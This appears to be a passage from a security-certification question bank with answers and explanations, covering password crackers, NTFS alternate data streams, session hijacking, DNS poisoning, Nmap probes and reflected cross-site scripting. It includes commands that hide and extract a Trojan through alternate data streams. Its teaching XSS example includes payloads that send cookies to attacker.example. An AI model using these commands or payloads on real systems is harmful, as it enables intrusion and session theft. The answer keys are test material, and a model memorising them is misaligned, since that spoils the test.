Q131. Which of the following are well-known password-cracking programs? (Choose all that apply.) 

A. L0phtcrack 

B. NetCat 

C. Jack the Ripper 

D. Netbus 

E. John the Ripper 

Answer: AE

Explanation: L0phtcrack and John the Ripper are two well-known password-cracking programs. Netcat is considered the Swiss-army knife of hacking tools (a raw TCP/UDP read/write utility) but is not used for password cracking; NetBus is a remote-access Trojan, and "Jack the Ripper" is simply a distractor playing on the name of John the Ripper. 


Q132. You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming. 

Which command would you execute to extract the Trojan to a standalone file? 

A. c:\> type readme.txt:virus.exe > virus.exe 

B. c:\> more readme.txt | virus.exe > virus.exe 

C. c:\> cat readme.txt:virus.exe > virus.exe 

D. c:\> list readme.txt$virus.exe > virus.exe 

Answer: C

Explanation: cat (the Unix-style utility shipped in the Windows NT Resource Kit) reads the alternate data stream readme.txt:virus.exe and the redirection writes its contents to a standalone file named virus.exe; "concatenating" a single input is just copying it. The stream is addressed with the filename:streamname syntax, the same syntax used to create it. On Vista and later, dir /r lists a file's alternate streams and PowerShell's Get-Item -Stream * and Get-Content -Stream do the same job without the Resource Kit. 


Q133. Bob, an administrator at a company, was furious when he discovered that his buddy Trent had launched a session hijack attack against his network and sniffed his communications, including administrative tasks such as configuring routers, firewalls and IDS via Telnet. 

Bob, being an unhappy administrator, seeks your help in ensuring that attackers such as Trent will not be able to launch a session hijack in the company. 

Based on the above scenario, which would be your corrective actions? (Choose two) 

A. Use encrypted protocols, like those found in the OpenSSH suite. 

B. Implement FAT32 filesystem for faster indexing and improved performance. 

C. Configure the appropriate spoof rules on gateways (internal and external). 

D. Monitor for ARP caches, by using IDS products. 

Answer: AC

Explanation: First, encrypt the traffic between the parties: replace Telnet with SSH (or another protocol from the OpenSSH suite) so that neither the credentials nor the session contents, including any session identifiers, can be sniffed. This is the same technique web-based banks and e-commerce services rely on with TLS, because it defeats sniffing-style attacks outright; an attacker who cannot read the session cannot learn the state needed to take it over. Encryption alone does not rule out every other form of hijacking, so as a second measure configure anti-spoofing rules on the gateways (internal and external). These stop the attacker from sourcing packets with the victim's IP address, and you can then add a secondary check that a session's source IP does not change in the middle of the session. The filesystem in use (FAT32 or otherwise) has no bearing on session security. 


Q134. Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. 

A. True 

B. False 

Answer: A

Explanation: With HTTP Basic authentication the browser sends the username and password in every request, in an Authorization header whose value is just base64("user:password"). Base64 is an encoding, not encryption: anyone who can capture the traffic recovers the password with a single decode. Use Basic authentication only over TLS (HTTPS), where the whole request including that header is encrypted, and do not use it elsewhere unless you understand the ramifications. 
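As an added illustration, not part of the original question set, the following Python shows what a sniffer sees and why base64 is no protection: it parses a constructed HTTP request capture (the host, path and credentials are invented for the example) and recovers the cleartext credentials from the Basic header.

```python
import base64
import binascii
from typing import Optional, Tuple

# Constructed sample: the bytes a sniffer on the path would see for one
# request to a server that uses HTTP Basic authentication (not a real capture;
# host, path and credentials are invented for this example).
CAPTURED_REQUEST = (
    "GET /admin/ HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "Authorization: Basic YWRtaW46UGFzc3cwcmQh\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

# A second constructed request with no credentials, for the negative case.
ANONYMOUS_REQUEST = "GET / HTTP/1.1\r\nHost: intranet.example\r\n\r\n"


def header_value(raw_request: str, name: str) -> Optional[str]:
    """Return the value of the first header called `name` (case-insensitive), or None."""
    head = raw_request.partition("\r\n\r\n")[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        field, sep, value = line.partition(":")
        if sep and field.strip().lower() == name.lower():
            return value.strip()
    return None


def extract_basic_credentials(raw_request: str) -> Optional[Tuple[str, str]]:
    """Recover (username, password) from a Basic Authorization header.

    Basic auth is base64 *encoding*, not encryption: one decode call turns the
    header back into the cleartext "user:password" pair. Returns None when the
    request carries no Basic header or the token is malformed.
    """
    value = header_value(raw_request, "Authorization")
    if value is None:
        return None
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, colon, password = decoded.partition(":")
    return (user, password) if colon else None


def build_basic_header(user: str, password: str) -> str:
    """What the browser sends; included to show the round trip is lossless."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


if __name__ == "__main__":
    print(extract_basic_credentials(CAPTURED_REQUEST))   # ('admin', 'Passw0rd!')
```

The only thing that stops this decode from working is that the sniffer never sees the header in the first place, which is what TLS provides; nothing about Basic authentication itself helps.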


Q135. What file system vulnerability does the following command take advantage of? 

type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe 

A. HFS 

B. ADS 

C. NTFS 

D. Backdoor access 

Answer: B

Explanation: ADS (Alternate Data Streams) is a "feature" of the NTFS file system that makes it possible to hide data in alternate streams of an existing file. A file can have multiple data streams, addressed as filename:streamname; the command above copies anyfile.exe into a stream attached to calc.exe, and neither Explorer nor a plain dir listing shows the extra data or its size. NTFS (option C) is the file system the feature lives in, not the vulnerability itself. To check a system for streams, use dir /r (Vista and later), PowerShell's Get-Item -Stream *, or the Sysinternals streams tool. 


Q136. An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying protocol does not reliably report closed ports. This means that 'no response' from the probed IP address can mean which of the following: 

(Select up to 3) 

A. Invalid community string 

B. S-AUTH protocol is running on the SNMP server 

C. Machine unreachable 

D. SNMP server not running 

Answer: ACD

Explanation: SNMP runs over UDP, so there is no handshake to confirm that the port is open. An agent that receives a request with the wrong community string silently drops it; a host that is down or filtered produces no response either; and a host that is up but has no agent listening only answers with an ICMP port-unreachable message if nothing on the path filters it. All three conditions therefore look identical to the scanner: silence. "S-AUTH" is not an SNMP component (SNMPv3 provides authentication and privacy through its User-based Security Model). See http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol 


Q137. Joseph was the Web site administrator for Mason Insurance in New York, whose main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks!'' 

From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page: 

H@cker Mess@ge: 

Y0u @re De@d! Fre@ks! 

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. 

How did the attacker accomplish this hack? 

A. ARP spoofing 

B. SQL injection 

C. DNS poisoning 

D. Routing table injection 

Answer: C

Explanation: External requests for the Web site were redirected to another server by a successful DNS poisoning. Tripwire showed that every file on the real server was intact, and Joseph saw the correct site from the internal network, which resolves www.masonins.com through the company's own name servers; clients of Smith's ISP, whose resolver cache had been poisoned, were sent to the attacker's copy of the site. An intact server that looks right from inside and wrong from one ISP is the signature of a poisoned resolver cache, not of ARP spoofing (which only works on the local segment) or of SQL injection (which would have altered the real server's content). 


Q138. When Nmap performs a ping sweep, which of the following sets of requests does it send to the target device? 

A. ICMP ECHO_REQUEST & TCP SYN 

B. ICMP ECHO_REQUEST & TCP ACK 

C. ICMP ECHO_REPLY & TCP RST 

D. ICMP ECHO_REPLY & TCP FIN 

Answer: B

Explanation: The classic default host-discovery behavior of Nmap is to send both an ICMP echo request (the usual kind of ping) and a TCP ACK to port 80; the ACK probe elicits a RST from live hosts even where ICMP is filtered. If an administrator is logging these probes, the pair is fairly characteristic of Nmap. Current Nmap versions, when run with raw-packet privileges, send four probes by default: an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request (equivalent to -PE -PS443 -PA80 -PP). 
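Added example, not from the original question bank: the following Python builds the two probe packets the question describes (an ICMP echo request and a TCP ACK to port 80) byte for byte, including the RFC 1071 checksums, and goes one step beyond the question by also building the TCP SYN to 443 and ICMP timestamp request that current Nmap sends by default. Addresses, ports, identifiers and the "nmap" payload are constructed values; the code only crafts and validates the bytes and never puts anything on the wire, so it runs without privileges.

```python
import socket
import struct
from typing import Dict, Iterable, Set

TCP_FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def inet_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words, then complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def icmp_packet(icmp_type: int, ident: int, seq: int, payload: bytes = b"") -> bytes:
    """ICMP header (type, code 0, checksum, id, seq) plus payload, checksum filled in."""
    unchecked = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    return struct.pack("!BBHHH", icmp_type, 0, inet_checksum(unchecked), ident, seq) + payload


def icmp_is_valid(packet: bytes) -> bool:
    """A correctly checksummed ICMP message sums to zero."""
    return inet_checksum(packet) == 0


def _pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    """IPv4 pseudo-header that the TCP checksum covers in addition to the segment."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                       0, socket.IPPROTO_TCP, tcp_len)


def tcp_probe(src_ip: str, dst_ip: str, src_port: int, dst_port: int,
              flags: Iterable[str], seq: int = 0, ack: int = 0, window: int = 1024) -> bytes:
    """A bare 20-byte TCP segment (no options, no data) with the given flags set."""
    flag_bits = 0
    for name in flags:
        flag_bits |= TCP_FLAG_BITS[name]
    offset_flags = (5 << 12) | flag_bits          # data offset 5 words, reserved bits zero

    def build(csum: int) -> bytes:
        return struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack, offset_flags, window, csum, 0)

    unchecked = build(0)
    return build(inet_checksum(_pseudo_header(src_ip, dst_ip, len(unchecked)) + unchecked))


def tcp_is_valid(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    return inet_checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def tcp_flags(segment: bytes) -> Set[str]:
    """Decode the flag bits: what a firewall log line would show for the probe."""
    offset_flags = struct.unpack("!H", segment[12:14])[0]
    return {name for name, bit in TCP_FLAG_BITS.items() if offset_flags & bit}


def tcp_dst_port(segment: bytes) -> int:
    return struct.unpack("!H", segment[2:4])[0]


def nmap_ping_sweep_probes(src_ip: str, dst_ip: str, src_port: int = 40000) -> Dict[str, bytes]:
    """Host-discovery probes keyed by name.

    The first two are the pair the question describes (classic Nmap default);
    the last two are the extra probes current Nmap adds when run with raw-socket
    privileges. Identifier, sequence number and payload are constructed values.
    """
    return {
        "icmp_echo": icmp_packet(8, 0x1234, 1, b"nmap"),                    # -PE
        "tcp_ack_80": tcp_probe(src_ip, dst_ip, src_port, 80, ("ACK",)),    # -PA80
        "tcp_syn_443": tcp_probe(src_ip, dst_ip, src_port, 443, ("SYN",)),  # -PS443
        "icmp_timestamp": icmp_packet(13, 0x1234, 1, bytes(12)),            # -PP, three zero timestamps
    }


if __name__ == "__main__":
    for name, pkt in nmap_ping_sweep_probes("192.0.2.10", "192.0.2.80").items():
        print(f"{name:15} {len(pkt):3d} bytes  {pkt.hex()}")
```

The ACK-only segment with no preceding SYN is the detail worth remembering for detection: a stateful firewall drops it, but a live host behind a stateless filter answers with a RST, which is exactly the "open or closed, the host is up" signal Nmap is after.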


Q139. You just purchased the latest DELL computer, which comes pre-installed with Windows XP, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. 

Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. 

A. A new installation of Windows should be patched by installing the latest service packs and hotfixes 

B. Enable “guest” account 

C. Install a personal firewall and lock down unused ports from connecting to your computer 

D. Install the latest signatures for Antivirus software 

E. Configure “Windows Update” to automatic 

F. Create a non-admin user with a complex password and login to this account 

Answer: ACDEF

Explanation: The guest account is a possible vulnerability to your system, so do not enable it unless it is needed. Perform all the other actions in order to have a reasonably secure system, and mind the order: enable the personal firewall before the machine is first connected to the cable modem, because an unpatched XP host exposed directly to the Internet can be compromised before the updates have finished downloading. 

Topic 23, Mixed Questions 

566. One of the better features of NetWare is the use of packet signature, which includes cryptographic signatures. The packet signature mechanism has four levels, from 0 to 3. 

In the list below which of the choices represent the level that forces NetWare to sign all packets? 

A. 0 (zero) 

B. 1 

C. 2 

D. 3 

Answer: D

Explanation: The NCP packet signature levels on the server side are: 

0: Server does not sign packets (regardless of the client level). 

1: Server signs packets only if the client requests it (client level is 2 or higher). 

2: Server signs packets if the client is capable of signing (client level is 1 or higher). 

3: Server signs packets and requires all clients to sign packets, or logging in will fail. 


Q140. Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack? 

A. Phishing 

B. Denial of Service 

C. Cross Site Scripting 

D. Backdoor installation 

Answer: C

Explanation: This is a typical Type-1 Cross Site Scripting attack. The scenario gives it away: nothing is downloaded and run as a program; instead script embedded in the page runs in Chris's browser with his session and privileges on the bulletin board, which is what lets Kevin reach information Chris can access there. This kind of cross-site scripting hole is also referred to as a non-persistent or reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, client-side code can be injected into the dynamic page. A classic example is a site search engine: if one searches for a string that includes some HTML special characters, the search string is often redisplayed on the result page to indicate what was searched for, or at least included in the text box for easier editing. If every occurrence of the search term is not HTML entity encoded, an XSS hole results.
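Added example, not code from the original page: a minimal reflected-XSS demonstration in Python of the search-engine case just described. render_search_vulnerable echoes the q parameter straight into the page, render_search_safe HTML-entity encodes it (html.escape with quote=True, which also covers the attribute context), and parse_page uses the standard-library HTML parser to show which render lets the attacker's tag or event handler through. forum.example and attacker.example, the URL layout and the two payloads are constructed for this example.

```python
import html
from html.parser import HTMLParser
from typing import Callable, List, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed for this example: two payloads Kevin could put behind the link
# in his e-mail, one that injects a tag and one that breaks out of an attribute.
# forum.example and attacker.example are placeholder hosts.
TAG_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="fetch(\'http://attacker.example/?c=\'+document.cookie)'


def attacker_link(payload: str) -> str:
    """The URL in the e-mail: the payload rides in the search parameter."""
    return "http://forum.example/search?" + urlencode({"q": payload})


def query_from_url(url: str) -> str:
    """What the server-side search script reads from the request."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_search_vulnerable(query: str) -> str:
    """Echoes the term straight back into the page: the hole described above."""
    return (
        "<html><body>"
        f"<p>You searched for: {query}</p>"
        f'<form><input type="text" name="q" value="{query}"></form>'
        "</body></html>"
    )


def render_search_safe(query: str) -> str:
    """Same page with HTML entity encoding. quote=True also encodes " and ',
    which is what keeps the value inside the attribute."""
    safe = html.escape(query, quote=True)
    return (
        "<html><body>"
        f"<p>You searched for: {safe}</p>"
        f'<form><input type="text" name="q" value="{safe}"></form>'
        "</body></html>"
    )


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute a browser would act on."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.handlers: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def parse_page(page: str) -> Tuple[List[str], List[str]]:
    collector = _TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags, collector.handlers


def is_exploitable(render: Callable[[str], str], payload: str) -> bool:
    """True if the payload survives the render as a live script tag or event handler."""
    tags, handlers = parse_page(render(query_from_url(attacker_link(payload))))
    return "script" in tags or bool(handlers)


if __name__ == "__main__":
    for name, render in [("vulnerable", render_search_vulnerable), ("safe", render_search_safe)]:
        for payload in (TAG_PAYLOAD, ATTR_PAYLOAD):
            verdict = "EXPLOITABLE" if is_exploitable(render, payload) else "blocked"
            print(f"{name:10} {verdict}")
```

The attribute payload is the one people miss: encoding only < and > would stop the script tag but still let the value break out of value="..." and add an onfocus handler, so the encoding has to be chosen for the context the data lands in, and for an attribute that means encoding the quotes as well.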